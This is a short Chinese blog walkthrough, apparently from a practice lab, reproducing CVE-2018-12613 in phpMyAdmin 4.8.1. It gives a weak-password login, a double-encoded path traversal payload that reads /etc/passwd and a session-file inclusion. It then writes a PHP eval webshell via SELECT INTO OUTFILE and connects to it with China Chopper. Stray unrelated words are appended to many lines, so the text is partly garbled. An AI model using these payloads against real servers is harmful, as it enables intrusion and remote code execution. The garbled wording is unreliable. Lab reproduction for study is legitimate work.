PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)

       phpmyadmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,经过二次编码便可绕过检查,形成远程文件包含漏洞。php

      漏洞复现环境:基于某平台的在线靶场进行漏洞复现html

复现过程:linux

1. 访问网址,是一处phpmyadmin的登陆地址首页,经过弱密码能够进入数据库管理界面sql

2. 根据在网上曝光的 CVE-2018-12613 的漏洞详情,在index.php后添加?target=db_sql.php%3f/../../../../../../../../etc/passwd,显示/etc/passwd的详细内容,可见 ,该版本确实存在文件包含漏洞数据库

3.F12查看复制该网站的session值,而后访问/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_[session],显示phpInfo的默认页面,在该页面找到网站的安装位置:/var/www/htmlsession

 

4.写入一句话木马,select '<?php @eval($_POST[hcl]) ?>' into outfile '/var/www/html/hcl.php'工具

5.上菜刀,链接 http://ip/hcl.php,菜刀链接成功,在根目录下找到了key.txt文件,查看key.txt文件,得到key值。网站

6. 完成!!!编码

 

知识点:每次登陆phpmyadmin系统的时候,系统就会产生一个sess_sessionID的文件,而后在里面执行的操做,会被记录到这个文件内(linux系统中存放路径为/tmp/sess_[当前会话session值])。3d